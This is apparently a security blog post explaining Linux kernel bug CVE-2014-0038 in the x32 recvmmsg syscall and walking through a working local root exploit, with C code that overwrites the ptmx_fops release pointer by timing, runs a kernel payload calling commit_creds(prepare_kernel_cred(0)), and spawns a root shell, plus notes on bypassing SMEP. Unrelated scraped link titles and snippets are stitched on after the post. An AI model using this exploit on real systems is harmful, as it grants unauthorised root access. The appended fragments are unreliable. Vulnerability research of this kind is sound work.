How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038
http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
The Vulnerable Linux Kernel Code
The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).
To be clear the x32 ABI (not to be confused with the X86 ABI) is a particular ABI and that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux ones have enabled it. For more details on the x32 ABI refer to [2]. In short x32 is an ABI which takes advantage of the 64-bit environment while using 32bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64bit applications by setting adding the value of __X32_SYSCALL_BIT to 64bit system call numbers.
The CVE 2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):
asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME) /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
/* ... */
Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:
SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
unsigned int, vlen, unsigned int, flags,
struct timespec __user *, timeout)
{
int datagrams;
struct timespec timeout_sys;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (!timeout)
return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL);
/* -1- */
if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys)))
return -EFAULT;
datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys);
if (datagrams > 0 &&
copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys)))
datagrams = -EFAULT;
return datagrams;
}
At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.
Digging Deeper Into the Vulnerability
First things first: the timespec structure, defined in include/uapi/linux/time.h:
struct timespec {
long tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:
int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
unsigned int flags, struct timespec *timeout)
{
if (timeout && /* -1- */
poll_select_set_timeout(&end_time, timeout->tv_sec,
timeout->tv_nsec))
return -EINVAL;
/* ... */
while (datagrams < vlen) { /* -2- */
/*
* Basically just a loop calling recvmsg
* until the timeout is hit or vlen messages have
* been received.
*/
if (MSG_CMSG_COMPAT & flags) {
err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
&msg_sys, flags & ~MSG_WAITFORONE,
datagrams);
/* ... */
} else {
err = ___sys_recvmsg(sock,
(struct msghdr __user *)entry,
&msg_sys, flags & ~MSG_WAITFORONE,
datagrams);
/* ... */
}
/* ... */
if (timeout) {
ktime_get_ts(timeout); // put current time into *timeout
// then subtract that from end_time
*timeout = timespec_sub(end_time, *timeout); /* -3- */
if (timeout->tv_sec < 0) {
timeout->tv_sec = timeout->tv_nsec = 0; /* -4- */
break;
}
/* Timeout, return less than vlen datagrams */
if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
break;
}
/* ... */
The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):
static inline bool timespec_valid(const struct timespec *ts)
{
/* Dates before 1970 are bogus */
if (ts->tv_sec < 0) /* -5- */
return false;
/* Can't have more nanoseconds then a second */
if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC) /* -6- */ // include/linux/time.h: #define NSEC_PER_SEC 1000000000L
return false;
return true;
}
At -5- the first long, tv_sec, is checked to be a positive number, meaning it's most significant byte must be smaller than 0x8, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 (= 1 second), so tv_nsec must be between 0 and 0x000000003b9aca00. Keep this in mind as we move on.
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by __sys_recvmsg the timeout struct is updated to contain the time left (-3-).
If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.
The Exploitation vector
So what can we do with this situation from an exploitation perspective?
The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.
In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.
Since kernel pointers always have the high 4 bytes set to 0xff they make a good target.
Imagine the following situation:
pointer: 0xffffffff44434241 uninitialized data
(little endian)
+-------------------------+-------------------------+-------------------------+
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
^ point timeout here
[-------- tv_sec -------] [------- tv_nsec -------]
If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).
To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as tv_nsec value and will then contain the remaining nanoseconds of the timeout.
A Walk-through of the Proof-of-concept Exploit
Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].
Here are the basic steps:
- Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload at the end of that region.
- Target the release function pointer of the ptmx_fops structure located in the .data section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.
- Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.
- Check if root privileges were obtained and start a shell.
Let's examine each of those steps in more detail.
Resolving symbols
The exploit needs four kernel symbols to be resolved, those are
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
They can be taken from /boot/System.map or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script (build.sh) which will help resolving with the symbols. The README in the PoC provides details on how to use it.
Setting things up
/* Prepare payload... */
printf("preparing payload buffer...\n");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);
The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.
The target
/*
* Now clear the three most significant bytes of the fops pointer
* to the release function.
* This will make it point into the memory region mapped above.
*/
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
for (i = 0; i < 3; i++) {
pids[i] = fork();
if (pids[i] == 0) {
zero_out(target + (5 + i));
exit(EXIT_SUCCESS);
}
sleep(1);
}
The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)
Exploiting the bug
void zero_out(long addr)
{
int sockfd, retval, port, pid, i;
struct sockaddr_in sa;
char buf[BUFSIZE];
struct mmsghdr msgs;
struct iovec iovecs;
srand(time(NULL));
port = 1024 + (rand() % (0x10000 - 1024));
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}
memset(&msgs, 0, sizeof(msgs));
iovecs.iov_base = buf;
iovecs.iov_len = BUFSIZE;
msgs.msg_hdr.msg_iov = &iovecs;
msgs.msg_hdr.msg_iovlen = 1;
/*
* start a separate process to send a UDP message after 255 seconds so the syscall returns,
* but not after updating the timeout struct and writing the remaining time into it.
* 0xff - 255 seconds = 0x00
*/
printf("clearing byte at 0x%lx\n", addr);
pid = fork();
if (pid == 0) {
memset(buf, 0x41, BUFSIZE);
if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
sleep(0xfe);
printf("waking up parent...\n");
sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa)); /* -1- */
exit(EXIT_SUCCESS);
} else if (pid > 0) {
retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); /* -2- */
if (retval == -1) {
printf("address can't be written to, not a valid timespec struct!\n");
exit(EXIT_FAILURE);
}
waitpid(pid, 0, 0);
printf("byte zeroed out\n");
} else {
perror("fork()");
exit(EXIT_FAILURE);
}
}
This is the key part of the exploit, we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the least significant byte of the timeout pointer (-2-) and the vulnerable syscall is called.
At -2- the forked child process will wake its parent so the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:
release pointer uninitialized uninitialized
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
^ address for child 3
^ address for child 2
^ address for child 1
Turning it into:
release pointer mangled mangled
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
ptmx_fops->release now points into the memory region that was mapped at the beginning.
Code execution in Ring 0
/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", 'r');
close(pwn);
At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.
Kernel payload
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
/* restore function pointer and following two longs */
*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
*((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0;
*((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0;
/* escalate to root */
commit_creds(prepare_kernel_cred(0));
return -1;
}
This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).
Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it upon the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyways this approach was chosen.
It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].
Finishing
if (getuid() != 0) {
printf("failed to get root :(\n");
exit(EXIT_FAILURE);
}
printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);
Some notes on reliability
Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second) the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a non-threaded exploit which clears the bytes sequentially can be used. You'd want to wait 255 seconds for each byte and this guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes 3 times longer as the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).
The original non-threaded version of this exploit in theory works reliably vs. the threaded version, but does take a while to execute.
Exploit restrictions
Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as kind of a DEP/NX for the kernel. To bypass SMEP the 20th bit of CR4 can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register exploitation would still be possible by writing the payload in ROP entirely.
Also see the post in [9].
That's it, find the full proof-of-concept exploit code at:
https://github.com/saelo/cve-2014-0038
If you have interesting optimizations or alternative implementations let us know via email info/at\includesecurity.com
References
[1] http://seclists.org/oss-sec/2014/q1/187
[2] http://en.wikipedia.org/wiki/x32_ABI
[3] http://www.phrack.org/issues.html?id=6&issue=64
[4] http://grsecurity.net/~spender/exploits/enlightenment.tgz
[5] http://packetstormsecurity.com/files/121616/semtex.c
[6] http://pastebin.com/DH3Lbg54
[7] http://en.wikipedia.org/wiki/Control_register#CR4
[8] http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
[9] http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux
How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038的更多相关文章
- ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)
ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...
- Windows kernel pool 初探(2014.12)
Windows kernel pool 1. 简介 Kernel pool类似于Windows用户层所使用Heap,其为内核组件提供系统资源.在系统初始化的时候,内存管理模块就创建了pool. 严格的 ...
- MS13-069(CVE-2013-3205) CCaret use-after-free Vulnerability Analysis (2014.9)
MS13-069(CVE-2013-3205) CCaret use-after-free Vulnerability Analysis 1. Introduction In IE's standar ...
- CVE-2014-0038内核漏洞原理与本地提权利用代码实现分析 作者:seteuid0
关键字:CVE-2014-0038,内核漏洞,POC,利用代码,本地提权,提权,exploit,cve analysis, privilege escalation, cve, kernel vuln ...
- Metasploit的基本使用
Metasploit可以在Linux.Windows和Mac OS X系统上运行.我假设你已安装了Metasploit,或者你使用的系统是Kali Linux.它有命令行接口也有GUI接口. 我使用的 ...
- An iOS zero-click radio proximity exploit odyssey
NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...
- CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...
- [转]Adventures in Xen exploitation
Source:https://www.nccgroup.com/en/blog/2015/02/adventures-in-xen-exploitation/ tl;dr This post is ...
- The Honeynet ProjectThe Honeynet Project
catalogue . 蜜罐基本概念 . Kippo: SSH低交互蜜罐安装.使用 . Dionaea: 低交互式蜜罐框架部署 . Thug . Amun malware honeypots . Gl ...
随机推荐
- linux查看 inotify 提供的工具
[root@rsync-client-inotify ~]# ll /usr/local/bin/inotify* -rwxr-xr-x. 1 root root 38582 Jun 3 22:23 ...
- Centos7搭建日志服务器rsyslog+loganalyzer
一.系统环境 Rsyslog Server OS:CentOS 7 Rsyslog Server IP:172.28.194.118 Rsyslog Version: rsyslog-7.4.7-12 ...
- glDrawArrays 和 glDrawElements
在openGL中,所有图形都是通过分解成三角形的方式进行绘制.(一个矩形分解成两个三角形进行绘制) glDrawArrays 和 glDrawElements 的作用都是从一个数据数组中提取数据渲染 ...
- 树形dp专栏
前言 自己树形dp太菜了,要重点搞 219D Choosing Capital for Treeland 终于自己做了一道不算那么毒瘤的换根dp 令 \(f[u]\) 表示以 \(u\) 为根,子树内 ...
- jmeter中遇见的坑:url需要编码的
在postman中能请求成功,但是在jmeter就是请求失败报500错. 请求的 url :/graph/vertices?label=node&properties={"num& ...
- json和dict 在requests中请求
上面的问题,在这么晚的夜里解决了 data 接受的是json格式数据, json 接受dict格式点的数据, 这个文章中也讲到了https://www.cnblogs.com/beile/p/1086 ...
- TOJ 4105 Lines Counting (树状数组)
题意:给定N条线段,每条线段的两个端点L和R都是整数.然后给出M个询问,每次询问给定两个区间[L1,R1]和[L2,R2],问有多少条线段满足:L1≤L≤R1 , L2≤R≤R2 ? 题解,采用离线做 ...
- NODE升级到V12.X.X
Node.js 是一个基于Chrome JavaScript运行时的平台,可轻松构建快速,可扩展的网络应用程序.最新版本 node.js yum存储库 由其官方网站维护.使用本教程添加yum存储库,并 ...
- 批处理bat文件显示中文乱码解决方式
1.下载Notepad++并安装 2.选择编码,将文件编码转换为ANSI编码
- unique && stl的全排列
stl的全排列: 看代码. #include<iostream> #include<cstdio> #include<algorithm> #include< ...